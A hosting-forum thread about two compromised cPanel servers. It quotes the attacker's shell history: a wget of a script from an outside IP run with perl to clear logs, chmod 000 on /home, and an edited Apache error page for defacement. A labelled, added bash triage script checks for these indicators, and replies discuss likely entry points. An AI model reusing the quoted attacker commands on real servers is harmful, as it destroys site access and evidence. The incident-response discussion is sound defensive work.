Got 2 cPanel servers hacked... root gained, anyone know HOW they did it?

cass (Well-Known Member, joined Jul 17, 2002, Argentina/USA/Mexico):
On two completely different cPanel servers, the same hacker or team gained access... (from Morocco).
Anyone have an idea how this could be possible?
The two servers were up to date (cPanel and OS); one of them had CSF/LFD (5.32) and was hardened in many ways, the other didn't have CSF, but was running suPHP.
On both, SSH was running on non-standard ports.

We have already seen more than one server with the same issue....
They basically... chmod 000 /home, and edit the 403 line of /usr/local/apache/conf/includes/errordocument.conf to show a "hacked" HTML page, which is then shown on all websites running on the server. Then they run a "log cleaner".

First I thought it could be the CSF bug... but one of the servers didn't have it, and the other had it updated already...
We were looking around, and found the attacker's IP (41.140.*) was apparently logged on to WHM (per the Apache logs)...
but we still can't determine HOW they got root access.... both servers were updated, and running smoothly since the beginning... so we're afraid it could be a BUG that could affect other clients too.
I'm not saying it's a cPanel bug... I'm trying to find someone who would actually KNOW what they did, as most logs/history were deleted on this server.
Part of the history we found (as we logged in to the server quickly, before they left) was this:
14 cd /tmp
15 w
16 wget 41.140.110.54/log
17 pico /usr/local/apache/conf/includes/errordocument.conf
18 service httpd restart
19 ls -la /
20 chmod 000 /homechmod 000 /home
21 chmod 000 /home
22 chmod 000 /homechmod 000 /home2
23 chmod 000 /home2
24 perl log
25 perl log
(this last command is the one that clears the logs, and then they were just gone)
But we could see they got the file, which file they edited, etc.
It looks like this is the only damage done, but if this is a bug, they can actually do anything they want, as they were working as ROOT!

BTW, a similar problem was found recently here:
https://forums.cpanel.net/f5/hacking-attempt-problem-help-210052.html
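The post above leaves a clear set of indicators for anyone triaging a similar box: home directories forced to mode 000, a rewritten 403 ErrorDocument line, a script dropped in /tmp and then run with perl, log files emptied, and WHM requests from a suspect IP prefix. The script below is an added example, not code from the thread or from cPanel; it turns those indicators into repeatable checks. Every function takes a root directory so it can be run against a constructed sample tree (or a mounted forensic image) rather than only a live server. It assumes Linux coreutils and awk, and that a clean cPanel errordocument.conf carries the line `ErrorDocument 403 /403.shtml` (verify that against a known-good server before trusting the second check); the access log and IP prefix are parameters.

```bash
#!/usr/bin/env bash
# Added example (not from the thread): post-compromise triage for the
# indicators described above. Each check prints details to stderr and a
# finding count to stdout, and always exits 0 so it composes under 'set -e'.
# Assumptions: Linux coreutils + awk; cPanel's default 403 directive is
# "ErrorDocument 403 /403.shtml". On a real box pass "/" as the root.

check_home_perms() {    # directories named home* under $1 with mode 000
  local root="$1" n=0 d
  for d in "$root"/home*; do
    [ -d "$d" ] || continue
    case "$(ls -ld "$d" | cut -c1-10)" in
      d---------) echo "ALERT: $d is mode 000 (every site will 403)" >&2; n=$((n+1)) ;;
    esac
  done
  echo "$n"
}

check_errordocument() { # 403 line points somewhere other than the default
  local conf="$1/usr/local/apache/conf/includes/errordocument.conf" n=0 line
  [ -f "$conf" ] || { echo 0; return 0; }
  while IFS= read -r line; do
    case "$line" in
      \#*) ;;                                    # comment, ignore
      *"ErrorDocument 403 /403.shtml"*) ;;       # assumed cPanel default
      *"ErrorDocument 403"*) echo "ALERT: $conf: $line" >&2; n=$((n+1)) ;;
    esac
  done < "$conf"
  echo "$n"
}

check_tmp_droppers() {  # scripts dropped in /tmp (the "wget .../log; perl log" step)
  local root="$1" n=0 f
  for f in "$root"/tmp/*; do
    [ -f "$f" ] || continue
    case "$(head -n 1 "$f")" in
      '#!'*|*perl*) echo "SUSPECT: $f: $(head -n 1 "$f")" >&2; n=$((n+1)) ;;
    esac
  done
  echo "$n"
}

check_log_truncation() { # log cleaners commonly leave zero-length logs behind
  local root="$1" n=0 f
  for f in var/log/secure var/log/messages var/log/wtmp var/log/lastlog; do
    [ -e "$root/$f" ] || continue
    if [ ! -s "$root/$f" ]; then
      echo "ALERT: $root/$f is empty (possible log cleaner)" >&2; n=$((n+1))
    fi
  done
  echo "$n"
}

scan_access_log() {     # count (and echo to stderr) requests from an IP prefix
  local log="$1" prefix="$2"
  [ -f "$log" ] || { echo 0; return 0; }
  awk -v p="$prefix" 'index($0, p) == 1 { n++; print > "/dev/stderr" } END { print n + 0 }' "$log"
}

run_triage() {          # usage: run_triage ROOT ACCESS_LOG IP_PREFIX
  local root="$1" log="$2" prefix="$3" total=0
  total=$((total + $(check_home_perms "$root")))
  total=$((total + $(check_errordocument "$root")))
  total=$((total + $(check_tmp_droppers "$root")))
  total=$((total + $(check_log_truncation "$root")))
  total=$((total + $(scan_access_log "$log" "$prefix")))
  echo "$total"
}

# Stand-alone use: ./triage.sh / /usr/local/cpanel/logs/access_log 41.140.
if [ "$#" -ge 3 ]; then run_triage "$@"; fi
```

Run it before anything is cleaned up, and copy the outputs (plus a tar of /tmp and the edited errordocument.conf) off the box first; the checks are evidence collectors, not a substitute for reimaging a root-compromised server. The WHM access log on cPanel lives at /usr/local/cpanel/logs/access_log, which is where the "logged on to WHM" observation would normally be confirmed.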
k-planethost (Well-Known Member, joined Sep 22, 2009, Athens, Greece):
I suggest you hire a server admin for an hour or more to investigate your issue further.
Answering from this forum how they gained root access is difficult without logs.
Recompiled kernel, secured /tmp & /dev/shm, install mod_security with gotroot rules, firewall, disable functions in PHP, recompile PHP with Suhosin; there are various security methods to implement on your boxes.
BigLebowski (Well-Known Member, joined Dec 24, 2007):
Were the kernels fully patched? There have been several root vulnerabilities over the years. I've seen lots of boxes plundered that way. Also, did you have brute force checking on? If you look at the logs you will normally see thousands of passwords tried over several days if CSF is not enabled and blocking.

Dude
cass (Well-Known Member, joined Jul 17, 2002, Argentina/USA/Mexico):
Yes, brute force protection enabled (both CSF and cPanel), also mod_security.
Kernel not patched (last CentOS kernel installed).
Infopro (Well-Known Member, joined May 20, 2003, Pennsylvania; cPanel Access Level: Root Administrator):
Assuming you have CSF set to stop and block failed logins after 5 attempts, and you have no record of failed attempts (or do you?), then we might want to consider that the user with the root password to that server might have some sort of issue locally. This sort of thing does happen, where a user's computer is compromised somehow and passwords are pulled from plain text files where FTP clients may store passwords, for example FileZilla.

There was a very long thread on this topic a while back on these forums that discussed this sort of thing.